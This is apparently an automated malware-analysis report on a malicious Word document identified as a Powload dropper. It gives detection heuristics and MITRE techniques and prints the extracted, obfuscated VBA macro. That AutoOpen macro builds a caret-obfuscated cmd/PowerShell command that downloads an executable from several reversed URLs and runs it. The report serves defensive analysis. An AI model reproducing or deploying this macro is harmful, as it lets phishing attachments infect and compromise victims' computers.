Verdict: MALICIOUS
Risk Score: 142
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command-line process using 'cmd /V:/', likely to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Powload-6683006-0' further supports its role as a dropper.
Heuristics (5)
- ClamAV: Doc.Dropper.Powload-6683006-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Powload-6683006-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5097 bytes |

SHA-256: e7fa17bea7a3cdb3a2aa5b343c263683fd769ec136a868f6f735b6397ff472a7
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "EwiAcaJrEiEa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim SXpODS()
ReDim SXpODS(3)
SXpODS(0) = 93
SXpODS(1) = 8992
SXpODS(2) = 9459
Dim nfbmc()
ReDim nfbmc(3)
nfbmc(0) = 293675403
nfbmc(1) = 7
nfbmc(2) = 702
Dim hYjPi()
ReDim hYjPi(3)
hYjPi(0) = 93
hYjPi(1) = 5
hYjPi(2) = 1976
Dim jWQjS()
ReDim jWQjS(4)
jWQjS(0) = 17
jWQjS(1) = 303
jWQjS(2) = 982
jWQjS(3) = 9
Dim OapZu()
ReDim OapZu(5)
OapZu(0) = 2
OapZu(1) = 9
OapZu(2) = 98834684
OapZu(3) = 55210411
OapZu(4) = 91
Dim kWsjP()
ReDim kWsjP(4)
kWsjP(0) = 7408
kWsjP(1) = 321
kWsjP(2) = 9
kWsjP(3) = 312
Dim pzhPSF()
ReDim pzhPSF(5)
pzhPSF(0) = 3
pzhPSF(1) = 414933890
pzhPSF(2) = 89
pzhPSF(3) = 962
pzhPSF(4) = 9
Shell@ LTuzuiQ + KZbIqrscsDqR + nqLzrRwnOzbkp, Format(0)
Dim SJcYtF()
ReDim SJcYtF(2)
SJcYtF(0) = 6913
SJcYtF(1) = 65
End Sub
Attribute VB_Name = "FzniJjjRVH"
Function LTuzuiQ()
On _
Error _
Resume _
Next
Dim irbnC()
ReDim irbnC(2)
irbnC(0) = 2
irbnC(1) = 58
Dim QvZWJ()
ReDim QvZWJ(3)
QvZWJ(0) = 33
QvZWJ(1) = 72780562
QvZWJ(2) = 8
Dim AzHhc()
ReDim AzHhc(5)
AzHhc(0) = 6
AzHhc(1) = 392230015
AzHhc(2) = 8
AzHhc(3) = 9014
AzHhc(4) = 75197952
Dim XtDsl()
ReDim XtDsl(5)
XtDsl(0) = 63625617
XtDsl(1) = 8
XtDsl(2) = 5
XtDsl(3) = 823
XtDsl(4) = 9
OBijuHBFaLa = Format(Chr(5 + 14 + 8 + 7 + 65)) + "md /V:/" + Format(Chr(3 + 10 + 5 + 5 + 44)) + Format(Chr(1 + 4 + 2 + 2 + 25)) + "^s^et l" + "^e= ^ ^ ^ ^ " + " ^}}" + "^{h" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^t^a" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^};^k^a^er^" + "b^;" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "ia^$^ me^tI^-ek"
Dim MvTTn()
ReDim MvTTn(5)
MvTTn(0) = 997
MvTTn(1) = 2
MvTTn(2) = 409
MvTTn(3) = 9
MvTTn(4) = 8054
Dim TtCpY()
ReDim TtCpY(5)
TtCpY(0) = 517402771
TtCpY(1) = 299854020
TtCpY(2) = 91
TtCpY(3) = 5305
TtCpY(4) = 143
Dim uXRIj()
ReDim uXRIj(4)
uXRIj(0) = 350
uXRIj(1) = 34
uXRIj(2) = 640
uXRIj(3) = 385980877
Dim OjdDA()
ReDim OjdDA(5)
OjdDA(0) = 98889860
OjdDA(1) = 971
OjdDA(2) = 24
OjdDA(3) = 2
OjdDA(4) = 3998
rFqkiY = "^ovn^I^;)" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "ia^$" + "^ ,^j^p^X$(^el" + "iF^d^a^o^lnw^o^D.^w^u^I${^y" + "rt^{)ZXn$ ni^ ^j^pX$" + "(h" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^a^er^of^;'^" + "e^xe.'^+^O^U^I$+^'^\^'+" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^" + "i^lbup:vne$^=" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "^ia$^" + ";^'093'^ ^= O^UI$^" + ";)'@'(tilp^S^.'J2b6^B/^tn^etn" + "o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^-^pw/r^"
Dim tZnGwA()
ReDim tZnGwA(4)
tZnGwA(0) = 878
tZnGwA(1) = 167883523
tZnGwA(2) = 3977
tZnGwA(3) = 257
zUhDioazMp = "k^.o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^.^y^ar^t^i//^:p" + "^tth@A^" + "A" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "57^Bj/ur." + Format(Chr(5 + 14 + 8 + 7 + 65)) + "i^t^s" + "i^go^lk^ta" + "//^:^pt^th@l"
Dim rIzjH()
ReDim rIzjH(5)
rIzjH(0) = 15
rIzjH(1) = 85
rIzjH(2) = 222341352
rIzjH(3) = 774
rIzjH(4) = 15414680
Dim nWPYh()
ReDim nWPYh(2)
nWPYh(0) = 7
nWPYh(1) = 9917
Dim hjSSnC()
ReDim hjSSnC(4)
hjSSnC(0) = 8
hjSSnC(1) = 3925
hjSSnC(2) = 272
hjSSnC(3) = 971
Dim hiGHL()
ReDim hiGHL(3)
hiGHL(0) = 1819
hiGHL(1) = 7321
hiGHL(2) = 3
Dim GbGfr()
ReDim GbGfr(3)
GbGfr(0) = 174
GbGfr(1) = 94
GbGfr(2) = 11
Dim fwQjB()
ReDim fwQjB(3)
fwQjB(0) = 59130641
fwQjB(1) = 72
fwQjB(2) = 62
pWfpdNuIl = "^0^k5/^s^d" + "a^o^l^pu/tne^tno" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "-pw/ra^." + "u^d^e^.pl^u.sa^moi^" + "d^ie^do" + "tut^itsn^i//^:^p^t^" + "th@4p2u^Z01/^m^o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + ".^ov^it^isopro^lav//:^ptt" + "^h^@j^A^" + "M^2U/^ur^.ely^" + "t^snusbd//^:ptth'^=^Z^Xn$^;^t"
Dim jwJMh()
ReDim jwJMh(5)
jwJMh(0) = 350988871
jwJMh
... (truncated)